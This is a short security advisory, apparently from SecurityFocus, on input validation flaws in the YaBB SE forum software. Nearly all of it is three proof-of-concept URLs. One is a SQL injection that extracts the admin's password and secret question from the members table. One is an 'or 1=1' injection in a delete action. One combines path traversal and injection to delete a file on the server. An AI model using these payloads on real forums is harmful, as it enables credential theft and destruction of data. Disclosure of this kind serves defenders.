YABB SE Multiple Input Validation Vulnerabilities

No exploit is required.

The following proof of concept examples have been provided:
http://www.example.com/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%2
7,secretQuestion),null,null,null,null,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

http://www.example.com/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;posti
d=1+or+1=1+ORDER+BY+ID_MSG+DESC/*

http://www.example.com/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d
eleteme.txt;subject=hola;message=hola;postid=-1+UNION+SELECT+null,3,null,nul
l,null,null,null,null,null,null,null,null/* HTTP/1.0


 

Privacy Statement
Copyright 2010, SecurityFocus